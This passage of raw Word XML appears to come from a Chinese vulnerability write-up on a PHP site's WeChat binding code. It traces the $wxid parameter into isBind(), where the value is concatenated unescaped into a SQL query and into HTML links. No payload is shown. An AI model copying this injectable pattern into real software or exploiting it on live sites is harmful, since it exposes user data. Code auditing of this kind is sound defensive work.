          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">$wxid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个参数又传给了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> isBind()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法进行处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:after="22" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="4408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继续跟进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>isBind(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Code:295</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="415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group id="_x0000_s10005" style="width:319.5pt;height:49.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6390,983">
            <v:rect id="_x0000_s10012" style="position:absolute;width:6390;height:2" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s10011" style="position:absolute;left:2;top:2;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10010" style="position:absolute;left:6387;top:654;width:3;height:329" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s10009" style="position:absolute;top:654;width:2;height:329" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s10008" style="position:absolute;left:2;top:328;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10007" style="position:absolute;left:2;top:654;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:shape id="_x0000_s10006" type="#_x0000_t202" style="position:absolute;left:2;top:1;width:6385;height:979" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="40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z w:val="21"/>
                      </w:rPr>
                      <w:t>private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 function isBind($wxid='')</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="80"/>
                      <w:ind w:left="91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w w:val="99"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>{</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="80"/>
                      <w:ind w:left="1831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z w:val="21"/>
                      </w:rPr>
                      <w:t>if(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$wxid)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rPr>
          <w:rFonts w:ascii="微软雅黑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5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s9967" style="position:absolute;margin-left:89.75pt;margin-top:71.9pt;width:319.5pt;height:554.45pt;z-index:-368056;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1795,1438" coordsize="6390,11089">
            <v:rect id="_x0000_s10004" style="position:absolute;left:1795;top:1438;width:6390;height:2" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s10003" style="position:absolute;left:1797;top:1440;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10002" style="position:absolute;left:1797;top:1766;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10001" style="position:absolute;left:1797;top:2092;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10000" style="position:absolute;left:1797;top:2418;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9999" style="position:absolute;left:1797;top:2744;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9998" style="position:absolute;left:1797;top:3070;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9997" style="position:absolute;left:1797;top:3396;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9996" style="position:absolute;left:1797;top:3722;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9995" style="position:absolute;left:1797;top:4048;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9994" style="position:absolute;left:1797;top:4374;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9993" style="position:absolute;left:1797;top:4700;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9992" style="position:absolute;left:1797;top:5026;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9991" style="position:absolute;left:1797;top:5352;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9990" style="position:absolute;left:1797;top:5678;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9989" style="position:absolute;left:1797;top:6004;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9988" style="position:absolute;left:1797;top:6330;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9987" style="position:absolute;left:1797;top:6656;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9986" style="position:absolute;left:1797;top:6982;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9985" style="position:absolute;left:1797;top:7308;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9984" style="position:absolute;left:1797;top:7634;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9983" style="position:absolute;left:1797;top:7960;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9982" style="position:absolute;left:1797;top:8286;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9981" style="position:absolute;left:1797;top:8612;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9980" style="position:absolute;left:1797;top:8938;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9979" style="position:absolute;left:1797;top:9264;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9978" style="position:absolute;left:1797;top:9590;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9977" style="position:absolute;left:1797;top:9916;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9976" style="position:absolute;left:1797;top:10242;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9975" style="position:absolute;left:1797;top:10568;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9974" style="position:absolute;left:1797;top:10894;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9973" style="position:absolute;left:1797;top:11220;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9972" style="position:absolute;left:1797;top:11546;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9971" style="position:absolute;left:8182;top:12198;width:3;height:329" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s9970" style="position:absolute;left:1795;top:12198;width:2;height:329" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s9969" style="position:absolute;left:1797;top:11872;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9968" style="position:absolute;left:1797;top:12198;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9966" type="#_x0000_t202" style="position:absolute;margin-left:300.25pt;margin-top:434.5pt;width:5.75pt;height:10.45pt;z-index:2944;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="208" w:lineRule="exac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=</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9965" type="#_x0000_t202" style="position:absolute;margin-left:298.1pt;margin-top:467.15pt;width:46.1pt;height:26.65pt;z-index:2968;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="208" w:lineRule="exact"/>
                    <w:ind w:right="-1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=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas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sz w:val="21"/>
                    </w:rPr>
                    <w:t>$wxid;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="78"/>
                    <w:ind w:left="2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=</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w: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9964" type="#_x0000_t202" style="width:317.4pt;height:352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80020F">
                  <w:pPr>
                    <w:spacing w:line="208" w:lineRule="exact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78"/>
                    <w:ind w:left="2727" w:right="2771"/>
                    <w:jc w:val="center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$User =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="80" w:line="319" w:lineRule="auto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5"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>$this-&gt;obj-&gt;DB_select_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>once(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">"member","`wxid`='".$wxid."' </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>","`uid`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,`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username`");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="245" w:lineRule="exact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if(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$User['uid']&gt;0)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="80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78"/>
                    <w:ind w:left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User[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'bindtype'] = '1';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="80"/>
                    <w:ind w:left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User[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'cenetrTpl'] =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="33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Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>"&lt;Content&gt;&lt;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![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CDATA[</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>您的</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="28" w:line="280" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>".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iconv(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'gbk','utf-8',$this-&gt;config['sy_webname'])."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>帐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号：</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>"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.$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User['username']."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>已成功绑定！</w:t>
                  </w:r>
                  <w:r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Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">\n\n\n </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>您也可以</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">&lt;a </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>href=\""</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>.$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>this-&gt;config['sy_weburl']."/wap/index.php?m=l</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="261" w:lineRule="auto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w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>ogin&amp;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>wxid=".$wxid."\"&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>点击这里</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>&lt;/a&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>进行解绑或绑定其他帐</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:w w:val="95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号</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>]]&gt;&lt;/Content&gt;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="53"/>
                    <w:ind w:left="18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}else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80"/>
                    <w:ind w:left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$Token = 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getToken(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:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="80" w:line="316" w:lineRule="auto"/>
                    <w:ind w:firstLine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 xml:space="preserve">$Url = </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>'https</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>:/</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">/api.weixin.qq.com/cgi-bin/user/info?access_tok </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>en='.$Token.'&amp;openid='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.$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wxid.'&amp;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lang=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zh_CN';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="4226"/>
                    </w:tabs>
                    <w:spacing w:before="2"/>
                    <w:ind w:left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$CurlReturn</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>=</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="8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CurlPost(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$Url);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a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9963" type="#_x0000_t202" style="position:absolute;margin-left:89.9pt;margin-top:5.85pt;width:189.25pt;height:75.65pt;z-index:2872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spacing w:line="208" w:lineRule="exact"/>
                    <w:ind w:left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5"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>$UserInfo</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="8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j</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>son_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decode(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$CurlReturn);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="80"/>
                    <w:ind w:right="45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$wxid</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="78"/>
                    <w:ind w:right="228"/>
                    <w:jc w:val="right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5"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>$wxname</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="8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$UserInfo-&gt;nickname;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9962" type="#_x0000_t202" style="position:absolute;margin-left:89.9pt;margin-top:87.35pt;width:317.4pt;height:108.25pt;z-index:2896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spacing w:line="208" w:lineRule="exact"/>
                    <w:ind w:left="274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sz w:val="21"/>
                    </w:rPr>
                    <w:t>$this-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>config[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'token_time'] =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="8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sz w:val="21"/>
                    </w:rPr>
                    <w:t>time(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="80" w:line="273" w:lineRule="auto"/>
                    <w:ind w:firstLine="2748"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>$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User[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'cenetrTpl'] = '&lt;Content&gt;&lt;![CDATA[</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>您还没有绑定帐号，</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>&lt;a</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="39" w:line="273" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>href</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">="'.$this-&gt;config['sy_weburl'].'/wap/index.php?m=lo </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>gin&amp;wxid='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.$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wxid.'"</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>点击这里</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>&lt;/a&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>进行绑定</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>!]]</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>&gt;&lt;/Content&gt;'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="41"/>
                    <w:ind w:left="1831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w w:val="9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spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="6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5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="415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9955" style="width:319.5pt;height:32.85pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6390,657">
            <v:rect id="_x0000_s9961" style="position:absolute;width:6390;height:2" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s9960" style="position:absolute;left:6387;top:328;width:3;height:329" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s9959" style="position:absolute;top:328;width:2;height:329" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s9958" style="position:absolute;left:2;top:2;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9957" style="position:absolute;left:2;top:328;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:shape id="_x0000_s9956" type="#_x0000_t202" style="position:absolute;left:2;top:1;width:6385;height:653" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="41"/>
                      <w:ind w:left="1831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z w:val="21"/>
                      </w:rPr>
                      <w:t>return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 $User;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="78"/>
                      <w:ind w:left="91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w w:val="99"/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80020F">
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="417" w:right="405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这里传过来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$wxid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
